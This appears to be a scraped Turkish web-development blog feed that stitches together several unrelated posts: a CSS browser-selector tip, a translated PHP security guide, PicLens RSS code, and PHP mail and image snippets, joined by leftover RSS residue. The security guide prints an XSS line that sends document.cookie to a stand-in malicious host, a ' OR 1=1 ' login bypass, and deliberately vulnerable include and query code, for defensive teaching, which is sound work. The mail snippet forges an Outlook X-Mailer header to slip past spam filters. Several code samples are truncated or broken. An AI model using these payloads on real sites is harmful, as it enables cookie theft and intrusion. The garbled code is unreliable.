Güncellemeler

02 Kasım 2010 (v0.4.0)

Bir sayfa tasarlamaya başladığımızda favori kullandığımız tarayıcı ile tasarlarız. W3C standartlarına uygun tasarladığımız sayfalar bile bazı tarayıcılarda sorunlu görünmektedir. Bunun sebebi CSS stil kodlarının yorumlanmasının tarayıcıdan tarayıcıya farklılık göstermesidir. Tasarımcılar bu sorunu her tarayıcı için farklı CSS stilleri yazarak çözmeye çalışırlar. Bu yöntemlerin genel adına CSS Hack denir.

CSS Hack işlemleri sırasında hazırladığımız CSS stillerini farklı dosyalarda tutmak, her tarayıcı için farklı yöntemler, comment’ler uygulamak bazen sıkıcı ve karışıklık meydana getirebilir.

Başlıkta bahsettiğimiz Rafael Lima tarafından yazılan ve Creative Commons lisansla dağıttığı bu JavaScript kod ile CSS Hack işlemleri çok daha kolay hale getirilmiş.

CSS Browser Selector JS koduna resmi sitesinden ulaşabilir, örnekleri görebilirsiniz.

Kodun kullanımı çok basit, yapmanız gereken JS kodu sayfanıza çağırmak ve yazacağınız CSS kodlarında kullanılacak tarayıcı ve işletim sistemleri belirlemek.

Kodu sayfanıza eklemek ;

<head> </head> tagları arasında herhangi bir yere aşağıdaki kodu eklemeniz yeterli ;

<script src="css_browser_selector.js" type="text/javascript"></script>

CSS içinde kullanımı ;

html.gecko div#header { margin: 1em; }
.opera #header { margin: 1.2em; }
.ie .mylink { font-weight: bold; }
.mac.ie .mylink { font-weight: bold; }
.[os].[browser] .mylink { font-weight: bold; } /* .[os] ile .[browser] arasında boşluk yok */

Kullanılabilen İşletim Sistemi Kodları ;

win – Microsoft Windows
vista – Microsoft Windows Vista
linux – Linux (x11 ve linux)
mac – Mac OS
freebsd – FreeBSD
ipod – iPod Touch
iphone – iPhone
webtv – WebTV
mobile – J2ME Devices (ör: Opera mini)
j2me – J2ME Devices (ex: Opera mini)
blackberry – BlackBerry
android – Google Android
mobile – Tüm mobil cihazlar

Kullanılabilen Tarayıcı Kodları ;

ie – Internet Explorer (Tüm Sürümler)
ie8 – Internet Explorer 8.x
ie7 – Internet Explorer 7.x
ie6 – Internet Explorer 6.x
ie5 – Internet Explorer 5.x
gecko – Mozilla, Firefox (Tüm Sürümler), Camino
ff2 – Firefox 2
ff3 – Firefox 3
ff3_5 – Firefox 3.5
ff3_6 – Firefox 3.6
opera – Opera (Tüm Sürümler)
opera8 – Opera 8.x
opera9 – Opera 9.x
opera10 – Opera 10.x
konqueror – Konqueror
webkit or safari – Safari, NetNewsWire, OmniWeb, Shiira, Google Chrome
safari3 – Safari 3.x
chrome – Google Chrome
iron – SRWare Iron

Diğer dillerde benzer CSS seçicileri ;

Ruby on Rails Plugin by Reid MacDonald

PHP CSS Browser Selector by Bastian Allgeier

WordPress Plugin by Adrian hanft

Giriş

PHP, bir çok yazılım dilinden farklı olarak, buffer-overflows gibi hafıza problemleri olan, bundan dolayı güvenlik problemine neden olabilecek bir dil değildir. Aynı zamanda PHP öğrenilmesi kolay ve hızlı bir dildir. Bu kolay ve hızlı öğrenilebilirlik, bu dili bir çok kişinin öğrenmesine, aynı hızda üretim yaparak uygulama geliştirmesine de olanak sağlamaktadır. Ancak bu durum, bilinsizce yapılan kodlama teknikleri nedeniyle kendi içerisince ciddi bir güvenlik problemini yanında getirmektedir.
Bu klavuz size, online güvenlik, web tabanlı yazılım geliştirirken PHP’de temel güvenliği nasıl sağlayacağınız konusunda fikir vermek için hazırlanmıştır. Klavuz içerisinde başlangıç seviyesi kullanıcılar için önemli bilgiler, uzmanlar için belki de gözden kaçan ufak ipuçları bulunabilir.

Atak Tipleri:

XSS Atağı:
XSS “Cross Site Scriptting” anlamında kullanılmaktadır ve bir sayfaya içerik girmek -JavaScript gibi- gibi düşünebiliriz. XSS atakları genelde kullanıcının Cookie (çerez) lerini çalmak amacıyla kullanılır. Bu cookie’ler kullanıcı login bilgileri, sişreleri ya da benzeri önemli bilgileri içeriyor olabilir.

Basit anlamda bir örnek verelim.

$id=$_GET['id'];
echo "Gelen ID degeri:".$id;

Yukarıdaki kodda, $_GET[’id’] degiskeni bir sayı ise problem yok. Ancak ya aşağıdaki gibi bir kodsa?

<script>
window.location.href = "http://kotuamaclisite.com/cookie-calanscript.php?c=' + document.cookie;
</script>

Kullanıcı bir sekilde, bu kotu amaçlı kodu çalıştırırsa, tüm cookie bilgilerini kotü amaçlı siteye devredebilir.

XSS Ataklarından Nasıl Korunurum?

İlk olarak, asla kullanıcı girişi bilgilerine güvenmeyiniz. Kullanıcılardan girilen her bilgiyi mutlaka kontrol edip filtrelememiz gerekiyor. Yani gelen kullanıcı bilgilerini HTML tag’lerinden arındırırsak bir JavaScript kodu çalıştırılamak hale getirebiliriz. Bunu yapmanın en kolay yolu PHP’nin strip_tags() fonksiyonunu kullanmaktır. Bu fonksiyon tüm HTML tag’lerini temizleyecektir. HTML tag’lerini silmemek ama onları zararsız hale getirmk için htmlentities() fonksiyonunu da kullananilirsiniz. Bu fonksiyon, < ve > karakterlerini < ve >karakterlerine dönüştürecektir.

SQL Injection Yönetemi:

Günümüzde bir çok web sitesi verileri barındırmak için veritabanı kullanmaktadır. Bu bağlamda veritabanına girmek için bir çok INSERT, UPDATE ve SELECT işlemleri yapılmaktadır. Buna rağmen bir çok site, form verileri açısında SQL Injection yöntemi ile atağa uğramak konusunda yeterli güvenliğe sahip değildir.

SQL Injection, değiştirilmiş, atak için düzenlenmiş form içerikleri ile yapılan veritabanı sorgularıdır. Bu ataklar veritabanınızdan bir kaç veriyi çalmak, izinsiz login olmak, ya da tüm veritabanını silmek gibi sonuçları doğurabilir.

En genel kullanımı anlatmak için aşağıdaki kod örneğine bakalım:

site_users
WHERE
username = '$username'
AND
password = '$password'
");

if ( mysql_num_rows($result) > 0 )
// login oldu

Yukarıdaki kod örneği, SQL Injection için gerekli ortamı hazırlamaktadır, bu konuda zaafiyet oluştrabilecek bir kod örneğidir. Kötü amaçlı bir kişi yukarıdaki SQL’i değiştirerek sisteme izinsiz giriş yapabilir. (Kullanıcı şifresini girmeden login olabilir)

Örneğin kötü kullanıcı (saldırgan) kullanıcı adı alanına “rob” şifre (password) alanına aşağıdaki gibi bir giriş yaparsa:

‘ OR 1=1 ‘

Yukarıdaki kod şu şekli alır:

SELECT *
FROM
site_users
WHERE
username = 'rob'
AND
password = " OR 1=1

Bu SQL sorgusu ise, kullanıcı adı “rob” olan kaydın şifresi ne olursa olsun getirmektedir. Yani şifre kontrolu gerçekleşememiştir.

SQL Injection Atağından Nasıl Korunurum?

XSS Atağında olduğu gibi, en büyük sorun kullanıcının gönderdiği veriyi olduğu gibi kullanmaktır. Korunmanın en iyi yöntemi ise, kullancıı verisini riskli karakterlerden arındırmaktır. mysql_real_escape_string() fonksiyonu bu amaçla PHP içerisinde yer alıyor. Bu fonksiyon riskli olan ‘ ve ” gibi karakterleri temizlemektedir. Ayrıca, SQL sorgularınızda kullandığınız kullancıı verileri, eğer, sayı olmanı bekleniyorsa intval() fonksiyonu ile gelen verinin sadece sayı bilgisi olan kısmı alınmalıdır.

Dosya Yüklemesi Atağı (File Upload)

Kullancıların yükledikleri dosyalar en büyük güvenlik risk unsurlarının başında gelmektedir. Bu, tanımadığınzı bilmediğiniz dosyaları sunucunuzda barındırmak anlamındadır. Bu dosyalar, dosyalarınız silmek için, veri tabanınızı boşaltmak için olabilir. Ya da daha başka bir çok güvenlik problemine neden açabilecek dosyalar olabilir.

Buna rağmen, güvenli şekilde dosya almak kontrol içerisinde alındığında mümkündür.

Kullanıcıların sisteminize dosya yüklemesine izin verdiğiniz durumlarda, kontrol etmeniz gereken 2 önemli bilgi mevcuttur.

Birincisi, dosyanın “mime-type” ıdır. Yani, dosyanın header’ında bulunan ve dosya tipini belirten bölüm. Örneğin kullanıcının sadece resim dosyası upload etmesini istiyorsanız yüklenen dosyanın “mime-type” ı image/png, image/jpeg, image/gif, image/x-png ya da image/p-jpeg olmalıdır. Aşağıdaki kod bu kontrolü gerçekleştirir.

$validMimes = array(
'image/png',
'image/x-png',
'image/gif',
'image/jpeg',
'image/pjpeg'
);

$image = $_FILES['image'];

if(!in_array($image['type'], $validMimes)) {
die('Üzgünüm, izin verilmeyen dosya tipi.');
}

// İşlem tamam yüklemeyi gerçekletir vs vs.

İkinci kontrol etmeniz gereken bilgi ise, dosyanın uzantısıdır. Zira, mime-type bilgisi manuple edilebilir bir bilgidir. Bu bağlamda dosyanın uzantısını kontrol etmeniz gerekir. Zira bir kullanıcı, bir imaj dosyasının mime-type ı ile bir PHP dosyası gönderebilir. Bu durumda siz bir PHP dosyasını sisteminize almış olursunuz ki bu çok ciddi bir risk faktörüdür.

Bu durumdan korunmak için, sisteminize yüklediğiniz dosyaların uzantıları, siz tanımlamalısınız. Bu tanımlamayı ise mime-type bilgise göre yapabilirsiniz. Aşağıdaki örneğe bakalım:

$validMimes = array(
'image/png' => '.png',
'image/x-png' => '.png',
'image/gif' => '.gif',
'image/jpeg' => '.jpg',
'image/pjpeg' => '.jpg'
);

$image = $_FILES['image'];

if(!array_key_exists($image['type'], $validMimes)) {
die('Üzgünüm, izin verilmeyen dosya tipi.');
}

// Dosya uzantısını barındırmayan dosya adını alalım:
$filename = substr($image['name'], 0, strrpos($image['name'], '.'));

// Mime type göre dogru uzantıyı verelim
$filename .= $validMimes[$image['type']];

// İşlem tamam

Yukarıdaki örnekle, bir PHP dosyanının sanki bir resim dosyasıymış gibi sisteminize PHP dosyası olarak yüklenmesini engellediniz. Dosya mime-type’ı PNG’yi işaret ediyorsa, dosya uzantısı .png olacaktır.

Dosya Include Atağı:

Kullanımı çok yaygın olan index.php?sayfa=xxxx.php şeklideki dosya include yöntemi çok ciddi risk taşıyabilir. Bu kullanım genelde, menü yapısı, logo gibi bölümleri index.php ye kaydedip içerik bölümünü başka dosyalarda saklayarak site yönetimini kolaylaştırmak için kullanılır. Bu durumdaki yanlışlık,

include $_GET['sayfa'];

gibi bir kod ile gelen değişkene göre sayfayı include etmektendir.

Yukaridaki kullanımda PHP’nin allow_url_fopen ayarı ON durumda ise, yani aktifse, saldırgan başka bir sunucudaki dosyayı sitenize include edebiliyor demektir. Kodunuz da echo file_get_contents() değil de include kullanıdığı için bu çok sık karşılaşılan bir açığa sebebiyet vermektedir. Bu durum, sunucunuzun tüm kontrolünü saldırgana bırakmak demektir.

Bu durumdan yapabileceğiniz 2 şey vardır.

Birincisi, bir liste oluşturup gelen değişkeni burada kontrol etmektir. Örneğin şöyle bir kod ile:

switch($_GET['sayfa']) {
case "hakkimizda":
include('hakkimizda.php');
break;
case "haberler":
include('haberler.php');
break;
default:
include('anasayfa.php');
}

Bu kod ile include edebileceğiniz her sayfayı belirtiyor ve belirtmediğiniz sayfa için anasayfa.php dosyasını include ediyorsunuz. Bu yöntemin zor tarafı, ekleyeceğiniz her sayfayı bu listeye de eklemek zorunluluğudur.

İkinci bir yöntem ise, dışarodan gelen $_GET['sayfa'] değişkenini kontrol etmek ve temizlemektir.

$sayfa = preg_replace('/\W/si', '', $_GET['sayfa']);

include('./'.$sayfa.'.php');

Yukarıdaki kod, “..”, “/” gibi karakterleri temizleyerek kullanıcının 212.111.111.111 gibi ip ya da http://www.kotusite.com gibi domain belirtmesini engeller. Bu verileri 212111111111, httpwwwkotusitecom şekline çevirir.

Dosya include atağındaki diğer bir açık ise, include edilen dosyaların uzantılarını .inc gibi sunucunun tanımayacağı bir uzantı yapmaktır. Örneğin, config.inc gibi bir dosya yapıp bunu include etmek çok sakıncalı olabilir. Zira, saldırgan bu dosyanın adını ve yerini öğrendiğinde, eğer web suncuunuz bu dosyayı çalıştırabilir bir dosya olarak tanımıyorsa (ki tanımama ihtimali yüksektir), saldırdan dosya içeriğini görecektir. Bu durumda yapabileceğiniz, her türlü dosya uzantınızı .php yapmaktır. Boylece saldırgan bu dosyaların içeriğini görüntüleyemez. Diğer bir yöntem ise Apache sunucular için, aşağıdaki gibi bir .htaccess dosyası olusturarak .inc dosyalarının ulaşılmasını engelleyebilirsiniz.

<files ~ "\.inc$">
Order allow,deny
Deny from all
</files>

Register Globals Atağı:

register_globals değeri PHP ayarında ON durumda ise, $_POST, $_GET, $_SERVER, $_COOKIE, $_REQUEST, $_FILE ile gelen değişkenlere global değişkenler olarak ulaşabilirsiniz. Yani mesela $_POST[’mesaj’] değişkenine $mesaj olarak ulaşabilirsiniz.

register_globals değeri güncel PHP kurulumlarında varsayılan olarak OFF durumdadır. Ancak eski bir PHP kurulumu bulunan sunucuda, ya da sistem yönetici tarafından özellikle açılmış bir sunucuda ON durumunda olabilir (ki paylaşımlı hosting firmaları geçmiş müşterilerinin kodlarının uyumu adına açabiliyorlar).

register_globals’in ON olamsı durumu için aşağıdaki kodu inceleyelim.

dosya.php dosyası örneği:

if($_POST['username'] == 'rob' && $_POST['password'] == 'foo') {
$authenticated = true;
}

if($authenticated) {
// giriş başarılı bişeyler yapalım
}

Saldırgan, dosya.php?authenticated=true şeklinde bir URL çağrımı ile, sisteme izinsiz giriş yapabilir.

Bu durumda ne yapacağız, register_globals değerini OFF yapamayabileceğimiz durumların her zaman gerçekleşebileceğini düşünerek, kodumuzu şu şekilde değiştirelim.

$authenticated = false;

if($_POST['username'] == 'rob' && $_POST['password'] == 'foo') {
$authenticated = true;
}

if($authenticated) {
// giriş başarılı bişeyler yapalım
}

Bu kod, $authenticated değişkenini sayfa başında false yapmaktadır. $_POST’tan gelen veri eğer uygunsa $authenticated true yapılır. Böylece, dışarıdan gönderilen değişken ile izinsiz giriş yaplıması engellenmiş olur.

Derleme ve Çeviri : Okan ARI

Öncelikle PicLens fotograflarımızın küçük hallerini ve büyük hallerini bir RSS (XML) içinde toplamamızı istiyor ve bu topladığımız bilgileri photos.rss adı aldında galerinin bulunduğu ana klasörde bulundurmamız gerekiyor. Aşağıda yazdığım php kodu galerimizin bulunduğu klasörler içindeki fotolarmızı araştırıp XML haline getiriyor. Bilindiği üzere RSS uzantısı text/plain bir uzantıdır. Öncelikle rss uzantısı ile php çalıştıracağımızı Apache Web Sunucusu yazılımına bildirmemiz gerekli. Bu sebepten galerinin kök dizinine .htaccess diye bir dosya oluşturup içine aşağıdaki kodu yazıyoruz.

.htaccess içeriği

AddType application/x-httpd-php .rss

Daha sonrasında aşağıdaki kodları photos.rss dosyasını oluşturarak içine yapıştırıyoruz.

photos.rss içeriği

/*
PicLens XML Parser for ImageVue Image Gallery
Coder by Victorious
Web : http://muzaffer.akyil.net & Gallery : http://muzaffer.akyil.net/galeri
*/

//Tanımlar
$title = "Muzaffer AKYIL - Photographer"; //Sayfa Başlığı
$desc = "Muzaffer AKYIL Photographer"; //Sayfa Açıklaması
$link = "http://muzaffer.akyil.net/galeri/"; //Sayfa Linki
$klasor = "./content"; //Fotoğrafların Bulunduğu Klasör
// Tanım Sonu

header("Content-Type: application/xml; charset=ISO-8859-9");
function ListFiles($dir) {
    if($dh = opendir($dir)) {
        $files = Array();
        $inner_files = Array();
        while($file = readdir($dh)) {
            if($file != "." && $file != ".." && $file[0] != '.') {
                if(is_dir($dir . "/" . $file)) {
                    $inner_files = ListFiles($dir . "/" . $file);
                    if(is_array($inner_files)) $files = array_merge($files, $inner_files);
                } else {
				if(substr($file,-3) == 'jpg' || substr($file,-3) == 'JPG'){
					if(substr($file,0,2)!='tn') {
                    	array_push($files, $dir . "/tn_" . $file);
					}
				}
                }
            }
        }
        closedir($dh);
        return $files;
    }
}
echo '< ?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>'.$title.'</title>
        <link>'.$link.'</link>
        <description>'.$desc.'</description>
';
$x = 1;
foreach (ListFiles($klasor) as $key=>$file){
$normal_file = str_replace("tn_","",$file);
$thumb = $file;
echo "<item>
                <title>$x</title>
                <link>$file</link>
                <guid>$x</guid>
                <media :thumbnail url=\"$thumb\" />
                <media :content url=\"$normal_file\" type=\"image/jpeg\" />
        </item>";
$x = $x + 1;
}
echo '</channel>
</rss>';

Son olarak photos.rss içindeki Tanımlar bölümündeki bilgileri kendi galerimize göre değiştiriyoruz.

Artık galerinizin ana sayfasına girip PicLens butonuna tıklayabilirsiniz.

Kolay Gelsin.

Buyrun efendim ;

Link

• Kısayoldan Halletme
  Size gelen mailin ekinin uzantısını biliyorsanız (.zip,.rar,.mp3) winmail.dat dosyasının uzantısını buna çevirerek dosyayı kullanabilirsiniz.
• Online Tool ile
  Sorunu çözmek için yaptığım araştırmalar esnasında karşıma bir php tool çıktı. Bende onu sitemde kullanmaya karar verdim. Online Tool için tıklayınız.
• Gönderen taraflı çözüm
  Microsoft ilgili sorun için bir KB çıkarmış. Buradan ulaşabilirsiniz.

Umarım bu bilgiler faydalı olmuştur.
Saygılar…

Bu işlemi bir örnekle göstermek istedim. Örnekte php ye gömmek istediğimiz dosyamızı seçiyoruz ve formu gönderdiğimizde bizim php kodlarımız onu alıp içeriğini okuyup bir php dosya içine header functionu ile bir resim olusturarak basıyor. Kodları incelerseniz anlatılmak istenileni rahatlıkla anlarsınız.

Kolay gelsin..


if(@$olay == "Gönder") {
$di = fopen ($dosya, "r");
$dosyatip = substr("$dosya_name",strrpos($dosya_name,".")+1);
$boyut = filesize ($dosya);
$dicerik = fread ($di, $boyut);
fclose ($di);
$encdosya=base64_encode($dicerik);
header("Content-type: image/$dosyatip");
header("Content-length: $boyut");
echo base64_decode('$encdosya');


]]> http://muzaffer.akyil.net/2006/07/17/makale/admin/resmi-php-ile-goruntuleme.aspx/feed 0 http://muzaffer.akyil.net/2006/07/16/makale/admin/php-ile-spamsiz-mail-gonderme.aspx http://muzaffer.akyil.net/2006/07/16/makale/admin/php-ile-spamsiz-mail-gonderme.aspx#comments Sun, 16 Jul 2006 15:52:06 +0000 Muzaffer Ali AKYIL http://www.muzafferakyil.com/2006/07/16/php-ile-spam-olmayan-mail-gonderme/ PHP kodlayan bir çok insanın başına devamlı gelen bir olaydır bu. Sitenizin üyelerine gönderdiği mailler junk-spam-bulk klasörlerine düşerler devamlı.

Bir Email neden spam olarak algılanır ?

• Sunucu IP adresleri global spam listelerinde kara listede olabilir.
• SPF(sender policy framework) dediğimiz alıcı pop sunucusuna maili gönderenin gerçek bir mail sunucusu olduğunu belirten policynin kurulu olmaması.
• Reverse DNS (Ters DNS) kayıtlarının oluşturulmaması sonucu alıcı gönderenin ip si üzerinden gönderenin domainini kontrol ettiğinde karşısına bu sonucun çıkmaması durumu
• Ve başlıkla ilgili olan konumuz mail formatında header dediğimiz başlıkların eksik yada hatalı girilimi

Header gönderdiğimiz mailin nereden geldiği, neyle yazıldığı, ne formatta olduğunu bildirir. Benim kullandığım ve Hotmail, Gmail, Yahoo gibi sistemlerde sorunsuz bir şekilde mail göndermemi sağlayan kodları kullanımınıza sunuyorum.

İyi Çalışmalar

Kodlar :

$gonderenisim = "Muzaffer AKYIL";
$gonderenadres = "muza...@qtechnics.net";
$kime = "adr...@adres.com";
$konu = "Deneme Maili";
$mesaj = "deneme mesajı, mailin içeriği";

$headers = “MIME-Version: 1.0\n”;
$headers .= “Content-Transfer-encoding: 7bit\n”;
$headers .= “Content-type: text/plain; charset=windows-1254\n”;
$headers .= “From: \”$gonderenisim\” <$gonderenadres>\n”;
$headers .= “Return-path: $gondeenadres\n”;
$headers .= “Reply-To: \”$gonderenisim\” $gonderenadres\n”;
$headers .= “X-MSmail-Priority: Normal\n”;
$headers .= “X-Mailer: Microsoft Office Outlook, Build 11.0.5510\n”;
$headers .= “X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441\n”;
$headers .= “X-Sender: $gonderenadres\n”;

mail($kime, $konu, $mesaj, $headers);
?>

]]> http://muzaffer.akyil.net/2006/07/16/makale/admin/php-ile-spamsiz-mail-gonderme.aspx/feed 3